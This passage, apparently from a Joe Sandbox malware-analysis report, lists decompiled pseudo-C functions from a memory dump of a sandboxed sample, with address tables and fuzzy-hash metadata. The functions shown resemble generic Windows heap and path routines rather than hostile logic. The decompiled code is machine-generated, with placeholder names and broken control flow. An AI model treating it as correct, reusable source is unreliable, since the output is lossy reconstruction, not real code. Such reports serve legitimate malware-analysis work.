						goto L6;
					} else {
						_t48 = E00A51DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E00A63C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00A38999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                              0x00a38a0a
                                                              0x00a38a1c
                                                              0x00a38a23
                                                              0x00a38a2e
                                                              0x00a38a30
                                                              0x00a38a36
                                                              0x00a38a3c
                                                              0x00a38a3e
                                                              0x00a38a4a
                                                              0x00a38a52
                                                              0x00a38a9c
                                                              0x00a38aae
                                                              0x00a38a58
                                                              0x00a38a5e
                                                              0x00a38a6a
                                                              0x00a38a6f
                                                              0x00a38a75
                                                              0x00a38a7d
                                                              0x00a38a85
                                                              0x00a38a86
                                                              0x00a38a89
                                                              0x00a38a93
                                                              0x00a38a99
                                                              0x00a38a9b
                                                              0x00000000
                                                              0x00a38aaf
                                                              0x00a38abe
                                                              0x00a38ac3
                                                              0x00a38acb
                                                              0x00a38ad7
                                                              0x00a38ae0
                                                              0x00a38af1
                                                              0x00000000
                                                              0x00a38af1
                                                              0x00a38acd
                                                              0x00a38ad5
                                                              0x00a38afb
                                                              0x00a38afd
                                                              0x00a38aff
                                                              0x00a38b07
                                                              0x00a38b22
                                                              0x00a38b24
                                                              0x00a38b2a
                                                              0x00a38b2e
                                                              0x00a38b3f
                                                              0x00a38b78
                                                              0x00a38b41
                                                              0x00a38b52
                                                              0x00a38b54
                                                              0x00a38b5c
                                                              0x00a38b74
                                                              0x00a38b74
                                                              0x00a38b5c
                                                              0x00a38b3f
                                                              0x00a38b5e
                                                              0x00a38b61
                                                              0x00a38b64
                                                              0x00a38b64
                                                              0x00a38b6c
                                                              0x00a38b6c
                                                              0x00a38b11
                                                              0x00a89cd5
                                                              0x00a89cd5
                                                              0x00a38b17
                                                              0x00a38b1a
                                                              0x00a38b1a
                                                              0x00000000
                                                              0x00a38ad5
                                                              0x00a38a89

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37cff5d07a6591e12e64099dfc8fc3ccd7d87373a6120fd1aef69640e241dbd2
                                                              • Instruction ID: 2e632d0bb14db57c14f808e589473be73df7ce8526175cc685235cd0cfc7bc17
                                                              • Opcode Fuzzy Hash: 37cff5d07a6591e12e64099dfc8fc3ccd7d87373a6120fd1aef69640e241dbd2
                                                              • Instruction Fuzzy Hash: 6F4160B5A0032D9BDB24DF15CC88AA9B7F4FB54340F1145EAF81997252EB749E84CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AEFDE2 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 76%
                                                              			E00AEFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E00AEFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E00AF0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E00A47D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E00AE1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E00AF2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E00AEC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E00AEDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E00A47D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E00AEA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                              0x00aefde7
                                                              0x00aefde8
                                                              0x00aefdec
                                                              0x00aefdee
                                                              0x00aefdf5
                                                              0x00aefdf7
                                                              0x00aefdfc
                                                              0x00aefe19
                                                              0x00aefe22
                                                              0x00aefe26
                                                              0x00aefec6
                                                              0x00aefecd
                                                              0x00aefed5
                                                              0x00aefee7
                                                              0x00aefed7
                                                              0x00aefee0
                                                              0x00aefee0
                                                              0x00aefeef
                                                              0x00aeff00
                                                              0x00aeff02
                                                              0x00aeff07
                                                              0x00aeff07
                                                              0x00000000
                                                              0x00aefeef
                                                              0x00aefe33
                                                              0x00aefe55
                                                              0x00aefe59
                                                              0x00aefe5b
                                                              0x00aefe5e
                                                              0x00aefe69
                                                              0x00aefe6d
                                                              0x00aefe6d
                                                              0x00aefe69
                                                              0x00aefe35
                                                              0x00aefe41
                                                              0x00aefe41
                                                              0x00aefe79
                                                              0x00aefe8b
                                                              0x00aefe7b
                                                              0x00aefe84
                                                              0x00aefe84
                                                              0x00aefe93
                                                              0x00000000
                                                              0x00aefea8
                                                              0x00aefeba
                                                              0x00000000
                                                              0x00aefeba
                                                              0x00aefdfe
                                                              0x00aefe01
                                                              0x00aefe02
                                                              0x00aefe08
                                                              0x00aeff0c
                                                              0x00aeff14
                                                              0x00aeff14

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                              • Instruction ID: 0f6b96b51b3bd7cda7ee562d33549f9e9ea5f89c3056d744066c4644376d29f5
                                                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                              • Instruction Fuzzy Hash: B73106323046C46FD7229B6AC955F6ABBA9EFC5750F184478F8468B352DA74EC41C720
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AEEA55 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 70%
                                                              			E00AEEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E00A42280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E00AEE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E00A2F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E00A3FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E00AEAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E00AEBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E00A47D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E00ADFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E00A3FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E00AEA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                              0x00aeea55
                                                              0x00aeea66
                                                              0x00aeea68
                                                              0x00aeea6c
                                                              0x00aeea6f
                                                              0x00aeea72
                                                              0x00aeea75
                                                              0x00aeea7a
                                                              0x00aeea7a
                                                              0x00aeea7e
                                                              0x00aeea80
                                                              0x00aeea85
                                                              0x00aeea8b
                                                              0x00aeeab5
                                                              0x00aeeabc
                                                              0x00aeeabf
                                                              0x00aeeabf
                                                              0x00aeeaca
                                                              0x00aeeace
                                                              0x00aeead0
                                                              0x00aeeae4
                                                              0x00aeeaeb
                                                              0x00aeeaf0
                                                              0x00aeeaf5
                                                              0x00aeeb09
                                                              0x00aeeb0d
                                                              0x00aeeb1d
                                                              0x00aeeb2d
                                                              0x00aeeb38
                                                              0x00aeeb3d
                                                              0x00aeeb41
                                                              0x00aeeb4a
                                                              0x00aeeb60
                                                              0x00aeeb4c
                                                              0x00aeeb52
                                                              0x00aeeb59
                                                              0x00aeeb59
                                                              0x00aeeb68
                                                              0x00aeeb71
                                                              0x00aeeb71
                                                              0x00aeea8d
                                                              0x00aeea8f
                                                              0x00aeea92
                                                              0x00aeea97
                                                              0x00aeea97
                                                              0x00aeea9b
                                                              0x00aeea9c
                                                              0x00aeea9e
                                                              0x00aeeaa6
                                                              0x00aeeaa6
                                                              0x00aeeb7e

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                              • Instruction ID: e55f4ad33578066e2dd2ff3ed6af2d2162aa7b1a24dfc91e83931f8ae5c97acb
                                                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                              • Instruction Fuzzy Hash: 0231CF32604745AFC729DF25C981A6BB7AAFFC0350F048A2DF95287641EE30EC05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA69A6 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 69%
                                                              			E00AA69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0xb1d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00A36C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E00AA6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E00A69980() >= 0) {
							E00A42280(_t56, 0xb18778);
							_t77 = 1;
							_t68 = 1;
							if( *0xb18774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0xb18774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E00A2B6F0(0xa0c338, 0xa0c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E00A69520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E00A695D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E00A3FFB0(_t68, _t77, 0xb18778);
				}
				_pop(_t78);
				return E00A6B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                              0x00aa69b5
                                                              0x00aa69be
                                                              0x00aa69c3
                                                              0x00aa69c9
                                                              0x00aa69cc
                                                              0x00aa69d1
                                                              0x00aa69d3
                                                              0x00aa69de
                                                              0x00aa69e1
                                                              0x00aa69ea
                                                              0x00aa69f6
                                                              0x00aa69fe
                                                              0x00aa6a13
                                                              0x00aa6a14
                                                              0x00aa6a15
                                                              0x00aa6a16
                                                              0x00aa6a1e
                                                              0x00aa6a26
                                                              0x00aa6a31
                                                              0x00aa6a36
                                                              0x00aa6a37
                                                              0x00aa6a40
                                                              0x00aa6a49
                                                              0x00aa6a4a
                                                              0x00aa6a53
                                                              0x00aa6a59
                                                              0x00aa6a5d
                                                              0x00aa6a5e
                                                              0x00aa6a64
                                                              0x00aa6a67
                                                              0x00aa6a6a
                                                              0x00aa6a6d
                                                              0x00aa6a70
                                                              0x00aa6a77
                                                              0x00aa6a7d
                                                              0x00aa6a86
                                                              0x00aa6a89
                                                              0x00aa6a9c
                                                              0x00aa6a9f
                                                              0x00aa6aa2
                                                              0x00aa6aa5
                                                              0x00aa6aaf
                                                              0x00aa6ab1
                                                              0x00aa6ab8
                                                              0x00aa6ab9
                                                              0x00aa6abb
                                                              0x00aa6abe
                                                              0x00aa6ac5
                                                              0x00aa6ac5
                                                              0x00aa6aaf
                                                              0x00aa6a40
                                                              0x00aa6a26
                                                              0x00aa69fe
                                                              0x00aa6ace
                                                              0x00aa6ad0
                                                              0x00aa6ad3
                                                              0x00aa6ad8
                                                              0x00aa6adf
                                                              0x00aa6adf
                                                              0x00aa6ae8
                                                              0x00aa6aef
                                                              0x00aa6aef
                                                              0x00aa6af9
                                                              0x00aa6b06

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9774e4a05f77b9cd0aacce26e1d863c97e11c5e8a580dba2a50329d27cd449e7
                                                              • Instruction ID: 4b27c8c514876c6c4bc1329a200c50a634d6240c29221c28cec993091ada6128
                                                              • Opcode Fuzzy Hash: 9774e4a05f77b9cd0aacce26e1d863c97e11c5e8a580dba2a50329d27cd449e7
                                                              • Instruction Fuzzy Hash: 744177B1D00208AFDB21DFA9D941BEEBBF8FF48714F18852AE814A7291DB709905CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A25210 Relevance: .1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00A25210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00A252A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00A695D0();
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E00A3EB70(_t54, 0xb179a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E00A695D0();
								L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E00A3EB70(_t54, 0xb179a0);
						}
						return _t52;
					}
					L5:
					_t33 = E00A6F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E00A3EB70(_t54, 0xb179a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00A695D0();
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                              0x00a25220
                                                              0x00a25224
                                                              0x00a80d13
                                                              0x00a80d16
                                                              0x00a80d19
                                                              0x00a2522a
                                                              0x00a2522a
                                                              0x00a2522d
                                                              0x00a2522d
                                                              0x00a25231
                                                              0x00a25235
                                                              0x00a25239
                                                              0x00a80d5c
                                                              0x00a80d62
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80d6a
                                                              0x00a80d7b
                                                              0x00a80d7f
                                                              0x00a80d81
                                                              0x00a80d84
                                                              0x00a80d95
                                                              0x00a80d95
                                                              0x00a80d6c
                                                              0x00a80d71
                                                              0x00a80d71
                                                              0x00a80d9a
                                                              0x00000000
                                                              0x00a2524a
                                                              0x00a2524a
                                                              0x00a25250
                                                              0x00a80d24
                                                              0x00a80d35
                                                              0x00a80d39
                                                              0x00a80d3b
                                                              0x00a80d3e
                                                              0x00a80d50
                                                              0x00a80d50
                                                              0x00a80d26
                                                              0x00a80d2b
                                                              0x00a80d2b
                                                              0x00000000
                                                              0x00a80d55
                                                              0x00a25256
                                                              0x00a2525b
                                                              0x00a25265
                                                              0x00a80da7
                                                              0x00a2526b
                                                              0x00a2526e
                                                              0x00a25272
                                                              0x00a80db1
                                                              0x00a80db4
                                                              0x00a80dc5
                                                              0x00a80dc5
                                                              0x00a25272
                                                              0x00a25278
                                                              0x00a2527e
                                                              0x00a2528a
                                                              0x00a2528c
                                                              0x00a2528d
                                                              0x00000000
                                                              0x00a25280
                                                              0x00a25282
                                                              0x00a25288
                                                              0x00a2529f
                                                              0x00a25292
                                                              0x00000000
                                                              0x00a25292
                                                              0x00000000
                                                              0x00a25288
                                                              0x00a2527e

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71759af70b117ee7bcf30e930e4035490e7d9ea4817d191c9a521002784b7672
                                                              • Instruction ID: 23c8c402c0d9072620cc5449034cbb6780e979430d1e5be9dd3d8ce9efe78e77
                                                              • Opcode Fuzzy Hash: 71759af70b117ee7bcf30e930e4035490e7d9ea4817d191c9a521002784b7672
                                                              • Instruction Fuzzy Hash: 71310731641A10EBC766AF68DA81FA677B5FF50760F21862AF41A4B1E1EB70FC04C790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A63D43 Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A63D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E00A37B60(0, _t61, 0xa011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E00A37B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L00A44620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                              0x00a63d4c
                                                              0x00a63d50
                                                              0x00a63d55
                                                              0x00a63d5e
                                                              0x00a9e79a
                                                              0x00000000
                                                              0x00a9e79a
                                                              0x00a63d68
                                                              0x00a9e789
                                                              0x00a63d9d
                                                              0x00a63da3
                                                              0x00a63daf
                                                              0x00a63db5
                                                              0x00a63dbc
                                                              0x00a63dc4
                                                              0x00a63dc9
                                                              0x00a63dce
                                                              0x00a9e7ae
                                                              0x00a9e7ae
                                                              0x00a63dde
                                                              0x00a63de2
                                                              0x00a63de7
                                                              0x00a63e0d
                                                              0x00a63e13
                                                              0x00a63e16
                                                              0x00a63e1e
                                                              0x00a63e25
                                                              0x00a63e28
                                                              0x00000000
                                                              0x00000000
                                                              0x00a63e2a
                                                              0x00a63e2f
                                                              0x00a63e37
                                                              0x00a63e37
                                                              0x00000000
                                                              0x00a63e37
                                                              0x00a63e31
                                                              0x00000000
                                                              0x00a63e31
                                                              0x00a63e20
                                                              0x00a63e20
                                                              0x00a63e35
                                                              0x00000000
                                                              0x00a63de9
                                                              0x00a63de9
                                                              0x00a63de9
                                                              0x00a63dee
                                                              0x00a63dfd
                                                              0x00a63dff
                                                              0x00a63e02
                                                              0x00a63e05
                                                              0x00a63e05
                                                              0x00000000
                                                              0x00a63df0
                                                              0x00a63de7
                                                              0x00a9e78f
                                                              0x00a9e794
                                                              0x00a63d79
                                                              0x00a63d84
                                                              0x00a63d89
                                                              0x00a63d8e
                                                              0x00000000
                                                              0x00a9e7a4
                                                              0x00a63d96
                                                              0x00a63d9a
                                                              0x00000000
                                                              0x00a63d9a
                                                              0x00000000
                                                              0x00a9e794
                                                              0x00a63d6e
                                                              0x00a63d73
                                                              0x00000000
                                                              0x00a9e7b5
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a193814855ad7a6dc4d19b1a77cf8cf0e5ceaa86ee4e06710c52cda7833d6a56
                                                              • Instruction ID: 872ba9cb307f273ccef425e46e8e6296e6291a79e67a867b95de488bec56728e
                                                              • Opcode Fuzzy Hash: a193814855ad7a6dc4d19b1a77cf8cf0e5ceaa86ee4e06710c52cda7833d6a56
                                                              • Instruction Fuzzy Hash: FF31BE32604614DBCB28CF29C841A7ABBF5EF55B00B15846EE846CB391E730DD42D7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5A61C Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00A5A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0xb00220);
				E00A7D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0xb17b9c; // 0x0
				_t55 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E00A7D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
